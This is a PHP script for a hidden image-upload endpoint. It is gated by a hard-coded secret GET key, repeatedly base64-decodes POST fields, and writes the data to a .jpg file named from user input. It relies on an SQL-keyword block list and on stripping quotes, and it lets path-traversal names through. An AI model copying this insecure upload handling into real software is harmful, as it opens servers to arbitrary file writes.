<?php 
	//ini_set('memory_limit', '100K');
	error_reporting(0);
	//error_reporting(E_ALL);
	function b64_de($txt){
		$txt = base64_decode($txt);
		$txt = base64_decode($txt);
		$txt = base64_decode($txt);
		$txt = base64_decode($txt);
		return $txt;
	}
	function filtro_str_mysql($str){//,"'","#"
		/**/
		$val = array(
			"SELECT","FROM","WHERE","ORDER",
			"INSERT","INTO","VALUES","UPDATE",
			"SET","PASSWORD","FLUSH","DELETE",
			"ALTER","TABLE","LOAD","CREATE",
			"SHOW","USE","DATABASE","TRIGGER",
			"EVENT","LOCK","ROUTINE","VIEW",
			"DROP","EXECUTE","REFERENCES",
			"UPDATE","PHP"
		);//,"\""
		foreach($val as &$valor){
			if(preg_match("/".strtoupper($valor)."\b/",strtoupper($str))) die();
		}
	}
	function filtro_str($str){
		if(($str == "") || ($str == '') || ($str == NULL)) die();
		filtro_str_mysql($str);
		$str = strip_tags($str);
		//$txt = htmlentities($txt, ENT_NOQUOTES);
		//$txt = strtoupper($txt);
		//$txt = strtolower($txt);
		//$txt = urlencode($txt);
		$str = preg_replace("/#/", "", $str);
		$str = preg_replace("/'/", "", $str);
		$str = preg_replace("/\"/", "", $str);
		//$txt = htmlspecialchars($txt);
		//$str = htmlentities($str);
		$str = preg_replace("/.php/", "", $str);
		$str = preg_replace("/.PHP/", "", $str);
		return $str;
	}
	function filtro_str_file($str){
		if(($str == "") || ($str == '') || ($str == NULL)) die();
		filtro_str_mysql($str);
		return $str;
	}
	function archivo(){
		unset($_GET);
		// --> Limpiar SQL IN define(URL, $_SERVER['REQUEST_URI']); -> $_SERVER['REQUEST_URI']
		foreach($_POST as &$valor){
			filtro_str_mysql($valor);
		}
		//print_r($_POST);
		if($_POST["status"] == "login"){//Hola 'xD', buen d�a <a href="#">a</a>
			$var1 = filtro_str(b64_de($_POST["d1"])); // *
			$var2 = filtro_str(b64_de($_POST["d2"])); // *
			//$var3 = filtro_str(b64_de($_POST["d3"])); // imagen binario
			$var3 = filtro_str_file(base64_decode(filtro_str($_POST["d3"]))); // imagen binario
			$var4 = filtro_str($_POST["d4"]); // form-in
			$var5 = filtro_str($_POST["status"]); // login
			unset($_POST);
			//echo $var1.",".$var2;
			//echo $var2.".jpg";
			//echo "<pre>";print_r(explode(",",$var2));echo "</pre>";
			//$myfile = fopen("documentos/".$var2.".jpg", "wb") or die($var2.".jpg /0");
			$myfile = fopen("documentos/".$var2.".jpg", "wb") or die();
			//$myfile = fopen("documentos/00001.jpg", "wb") or die("error");
			fwrite($myfile, $var3);
			fclose($myfile);
			die();
		}else die();
	}
	if($_GET['djfkndfnnfajnfaenflienfaleuh9348rj9o348w'] == "jkfnawiejfa984ja98ifa98ij9w8aj39a8jeew8ja9ejapej983jr9i3fsieu3"){
		archivo();
		die();
	}else die();
	die();
?>